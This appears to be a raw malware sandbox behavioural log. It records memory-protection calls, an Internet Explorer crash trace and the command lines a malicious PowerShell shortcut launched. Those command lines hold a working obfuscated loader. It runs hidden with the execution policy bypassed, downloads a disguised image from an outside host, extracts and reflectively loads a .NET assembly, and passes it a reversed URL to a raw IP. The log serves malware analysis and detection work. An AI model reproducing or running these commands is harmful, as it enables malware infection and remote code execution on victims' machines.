1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007725d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077282000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077264000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077282000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc7d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc7d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe4f4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff871000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007724a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007724f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007724d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007724b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076fd6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077706000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076fd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077250000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007724a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000776df000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000776eb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe1a7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe494000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe491000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe496000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 1960 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdbfa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdf373c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0943bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdf55295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdf52799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdffaf1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdffb76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdf548d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe1c0883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe1c0ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe1c0c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefe07a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefe08d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe1c347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe1c122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe1c3542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefe08d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefe08d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77259bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x772598da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefe08d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe1b3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefe060106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefe060182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefdbfa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 97117264
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 97123216
registers.r11: 97119024
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1924636213
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)"
cmdline powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2624
thread_handle: 0x00000000000004d4
process_identifier: 2620
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgB